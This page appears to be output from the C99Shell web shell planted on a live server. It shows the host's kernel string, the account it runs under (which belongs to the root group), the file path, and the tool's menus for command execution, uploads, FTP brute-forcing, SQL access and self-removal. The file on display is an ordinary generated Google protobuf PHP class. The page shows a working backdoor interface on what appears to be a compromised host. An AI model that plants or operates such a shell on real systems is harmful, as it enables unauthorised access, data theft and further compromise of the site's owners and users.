!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/test.qr.picotech.app/public_html/vendor/google/common-protos/src/Api/   drwxr-xr-x
Free 29.25 GB of 117.98 GB (24.79%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     SelectiveGapicGeneration.php (4.63 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
# Generated by the protocol buffer compiler.  DO NOT EDIT!
# source: google/api/client.proto

namespace Google\Api;

use 
Google\Protobuf\Internal\GPBType;
use 
Google\Protobuf\Internal\RepeatedField;
use 
Google\Protobuf\Internal\GPBUtil;

/**
 * This message is used to configure the generation of a subset of the RPCs in
 * a service for client libraries.
 *
 * Generated from protobuf message <code>google.api.SelectiveGapicGeneration</code>
 */
class SelectiveGapicGeneration extends \Google\Protobuf\Internal\Message
{
    
/**
     * An allowlist of the fully qualified names of RPCs that should be included
     * on public client surfaces.
     *
     * Generated from protobuf field <code>repeated string methods = 1;</code>
     */
    
private $methods;
    
/**
     * Setting this to true indicates to the client generators that methods
     * that would be excluded from the generation should instead be generated
     * in a way that indicates these methods should not be consumed by
     * end users. How this is expressed is up to individual language
     * implementations to decide. Some examples may be: added annotations,
     * obfuscated identifiers, or other language idiomatic patterns.
     *
     * Generated from protobuf field <code>bool generate_omitted_as_internal = 2;</code>
     */
    
protected $generate_omitted_as_internal false;

    
/**
     * Constructor.
     *
     * @param array $data {
     *     Optional. Data for populating the Message object.
     *
     *     @type array<string>|\Google\Protobuf\Internal\RepeatedField $methods
     *           An allowlist of the fully qualified names of RPCs that should be included
     *           on public client surfaces.
     *     @type bool $generate_omitted_as_internal
     *           Setting this to true indicates to the client generators that methods
     *           that would be excluded from the generation should instead be generated
     *           in a way that indicates these methods should not be consumed by
     *           end users. How this is expressed is up to individual language
     *           implementations to decide. Some examples may be: added annotations,
     *           obfuscated identifiers, or other language idiomatic patterns.
     * }
     */
    
public function __construct($data NULL) {
        
\GPBMetadata\Google\Api\Client::initOnce();
        
parent::__construct($data);
    }

    
/**
     * An allowlist of the fully qualified names of RPCs that should be included
     * on public client surfaces.
     *
     * Generated from protobuf field <code>repeated string methods = 1;</code>
     * @return \Google\Protobuf\Internal\RepeatedField
     */
    
public function getMethods()
    {
        return 
$this->methods;
    }

    
/**
     * An allowlist of the fully qualified names of RPCs that should be included
     * on public client surfaces.
     *
     * Generated from protobuf field <code>repeated string methods = 1;</code>
     * @param array<string>|\Google\Protobuf\Internal\RepeatedField $var
     * @return $this
     */
    
public function setMethods($var)
    {
        
$arr GPBUtil::checkRepeatedField($var\Google\Protobuf\Internal\GPBType::STRING);
        
$this->methods $arr;

        return 
$this;
    }

    
/**
     * Setting this to true indicates to the client generators that methods
     * that would be excluded from the generation should instead be generated
     * in a way that indicates these methods should not be consumed by
     * end users. How this is expressed is up to individual language
     * implementations to decide. Some examples may be: added annotations,
     * obfuscated identifiers, or other language idiomatic patterns.
     *
     * Generated from protobuf field <code>bool generate_omitted_as_internal = 2;</code>
     * @return bool
     */
    
public function getGenerateOmittedAsInternal()
    {
        return 
$this->generate_omitted_as_internal;
    }

    
/**
     * Setting this to true indicates to the client generators that methods
     * that would be excluded from the generation should instead be generated
     * in a way that indicates these methods should not be consumed by
     * end users. How this is expressed is up to individual language
     * implementations to decide. Some examples may be: added annotations,
     * obfuscated identifiers, or other language idiomatic patterns.
     *
     * Generated from protobuf field <code>bool generate_omitted_as_internal = 2;</code>
     * @param bool $var
     * @return $this
     */
    
public function setGenerateOmittedAsInternal($var)
    {
        
GPBUtil::checkBool($var);
        
$this->generate_omitted_as_internal $var;

        return 
$this;
    }

}


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0042 ]--